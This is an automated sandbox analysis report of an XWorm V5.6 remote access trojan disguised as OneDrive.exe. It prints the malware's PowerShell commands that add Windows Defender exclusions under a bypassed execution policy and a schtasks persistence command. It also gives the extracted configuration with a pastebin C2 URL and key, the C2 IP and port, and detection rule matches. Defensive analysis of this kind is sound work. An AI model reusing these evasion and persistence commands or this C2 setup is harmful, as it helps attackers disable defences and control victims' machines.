Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OneDrive.exe

Overview

General Information

Sample name:OneDrive.exe
Analysis ID:1487313
MD5:a1cd6f4a3a37ed83515aa4752f98eb1d
SHA1:7f787c8d72787d8d130b4788b006b799167d1802
SHA256:5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OneDrive.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\OneDrive.exe" MD5: A1CD6F4A3A37ED83515AA4752F98EB1D)
    • powershell.exe (PID: 4940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 8176 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OneDrive.exe (PID: 6060 cmdline: C:\ProgramData\OneDrive.exe MD5: A1CD6F4A3A37ED83515AA4752F98EB1D)
  • OneDrive.exe (PID: 3252 cmdline: "C:\ProgramData\OneDrive.exe" MD5: A1CD6F4A3A37ED83515AA4752F98EB1D)
  • OneDrive.exe (PID: 3240 cmdline: "C:\ProgramData\OneDrive.exe" MD5: A1CD6F4A3A37ED83515AA4752F98EB1D)
  • OneDrive.exe (PID: 4844 cmdline: C:\ProgramData\OneDrive.exe MD5: A1CD6F4A3A37ED83515AA4752F98EB1D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OneDrive.exeJoeSecurity_XWormYara detected XWormJoe Security
    OneDrive.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x86f9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8796:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x88ab:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8371:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\OneDrive.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\ProgramData\OneDrive.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x86f9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8796:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x88ab:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8371:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1321731249.0000000000C02000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x84f9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8596:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x86ab:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x8171:$cnc4: POST / HTTP/1.1
        00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.2623623977.0000000012F91000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x111b9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x11256:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1136b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x10e31:$cnc4: POST / HTTP/1.1
          00000000.00000002.2587401909.0000000002FE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.OneDrive.exe.c00000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              0.0.OneDrive.exe.c00000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x86f9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8796:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x88ab:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8371:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDrive.exe", ParentImage: C:\Users\user\Desktop\OneDrive.exe, ParentProcessId: 6520, ParentProcessName: OneDrive.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', ProcessId: 4940, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDrive.exe", ParentImage: C:\Users\user\Desktop\OneDrive.exe, ParentProcessId: 6520, ParentProcessName: OneDrive.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', ProcessId: 4940, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\OneDrive.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\OneDrive.exe, ProcessId: 6520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDrive.exe", ParentImage: C:\Users\user\Desktop\OneDrive.exe, ParentProcessId: 6520, ParentProcessName: OneDrive.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', ProcessId: 4940, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\OneDrive.exe, ProcessId: 6520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OneDrive.exe", ParentImage: C:\Users\user\Desktop\OneDrive.exe, ParentProcessId: 6520, ParentProcessName: OneDrive.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe', ProcessId: 4940, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Suricata Signatures

              Timestamp:2024-08-03T20:12:53.723672+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:43.727618+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:03.728860+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:39.904638+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:18.579448+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:50.936956+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:01.971998+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:01.973762+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:13.698782+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:17.664712+0200
              SID:2855924
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:28.877964+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:33.708698+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:18.577918+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:28.873985+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:08.846945+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:39.906190+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:15.336241+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:15.337507+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:18.713980+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:55.643055+0200
              SID:2852874
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:25.649085+0200
              SID:2852874
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:58.733055+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:13:13.724165+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:23.699644+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:38.721339+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:50.938854+0200
              SID:2852923
              Source Port:49711
              Destination Port:7000
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:08.703840+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:48.726463+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-03T20:12:28.711921+0200
              SID:2852870
              Source Port:7000
              Destination Port:49711
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: OneDrive.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\ProgramData\OneDrive.exeAvira: detection malicious, Label: TR/Spy.Gen
              Found malware configuration
              Source: OneDrive.exeMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/RPPi3ByL", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\OneDrive.exeReversingLabs: Detection: 76%
              Multi AV Scanner detection for submitted file
              Source: OneDrive.exeVirustotal: Detection: 68%Perma Link
              Source: OneDrive.exeReversingLabs: Detection: 76%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\ProgramData\OneDrive.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: OneDrive.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: OneDrive.exeString decryptor: https://pastebin.com/raw/RPPi3ByL
              Source: OneDrive.exeString decryptor: <123456789>
              Source: OneDrive.exeString decryptor: <Xwormmm>
              Source: OneDrive.exeString decryptor: XWorm V5.6
              Source: OneDrive.exeString decryptor: USB.exe
              Source: OneDrive.exeString decryptor: %ProgramData%
              Source: OneDrive.exeString decryptor: OneDrive.exe
              Source: OneDrive.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.9:49710 version: TLS 1.2
              Source: OneDrive.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791\gdiplus.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://pastebin.com/raw/RPPi3ByL
              Connects to a pastebin service (likely for C&C)
              Source: unknownDNS query: name: pastebin.com
              Source: global trafficTCP traffic: 192.168.2.9:49711 -> 213.219.149.161:7000
              Source: global trafficHTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: powershell.exe, 00000002.00000002.1418402598.00000167C226C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000005.00000002.1523227635.000002C06BF57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
              Source: powershell.exe, 00000005.00000002.1523227635.000002C06BF57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
              Source: powershell.exe, 00000002.00000002.1418402598.00000167C226C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: powershell.exe, 00000002.00000002.1412318309.00000167B9DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1501492317.000002C0637BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1650062025.00000187E0F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1879819112.000001A64908D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000C.00000002.1717642825.000001A639248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1392868961.00000167A9FA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C05397A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D115A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A63935C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: OneDrive.exe, 00000000.00000002.2587401909.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1392868961.00000167A9D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1447122981.000002C053751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1555910150.00000187D0F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1717642825.000001A639021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
